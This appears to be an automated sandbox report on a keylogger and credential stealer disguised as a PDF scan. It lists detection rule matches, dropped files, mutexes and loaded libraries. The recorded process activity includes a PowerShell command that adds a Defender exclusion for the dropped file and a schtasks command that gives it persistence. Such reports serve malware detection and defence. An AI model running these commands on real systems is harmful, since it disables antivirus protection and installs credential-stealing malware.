                  Source: 9.2.QeSBxb.exe.47e5838.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 9.2.QeSBxb.exe.47e5838.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 9.2.QeSBxb.exe.4828a58.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 9.2.QeSBxb.exe.4828a58.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 9.2.QeSBxb.exe.47e5838.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 9.2.QeSBxb.exe.47e5838.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe PID: 1036, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: QeSBxb.exe PID: 6708, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: QeSBxb.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, N4HVLfQlWEtmNwYgDD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, N4HVLfQlWEtmNwYgDD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, V2mHZPR0N4oyaDDFW0.csSecurity API names: _0020.SetAccessControl
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, V2mHZPR0N4oyaDDFW0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, V2mHZPR0N4oyaDDFW0.csSecurity API names: _0020.AddAccessRule
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, V2mHZPR0N4oyaDDFW0.csSecurity API names: _0020.SetAccessControl
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, V2mHZPR0N4oyaDDFW0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, V2mHZPR0N4oyaDDFW0.csSecurity API names: _0020.AddAccessRule
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, N4HVLfQlWEtmNwYgDD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, V2mHZPR0N4oyaDDFW0.csSecurity API names: _0020.SetAccessControl
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, V2mHZPR0N4oyaDDFW0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, V2mHZPR0N4oyaDDFW0.csSecurity API names: _0020.AddAccessRule
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@18/11@4/3
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeFile created: C:\Users\user\AppData\Roaming\QeSBxb.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4200:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6820:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6780:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeMutant created: \Sessions\1\BaseNamedObjects\FLINeBBi
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeFile created: C:\Users\user\AppData\Local\Temp\tmpC1CB.tmpJump to behavior
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003444000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000003104000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeReversingLabs: Detection: 26%
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeFile read: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe"
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QeSBxb.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpC1CB.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess created: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe"
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess created: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\QeSBxb.exe C:\Users\user\AppData\Roaming\QeSBxb.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpD080.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess created: C:\Users\user\AppData\Roaming\QeSBxb.exe "C:\Users\user\AppData\Roaming\QeSBxb.exe"
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QeSBxb.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpC1CB.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess created: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess created: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpD080.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess created: C:\Users\user\AppData\Roaming\QeSBxb.exe "C:\Users\user\AppData\Roaming\QeSBxb.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: cryptsp.dllJump to behavior
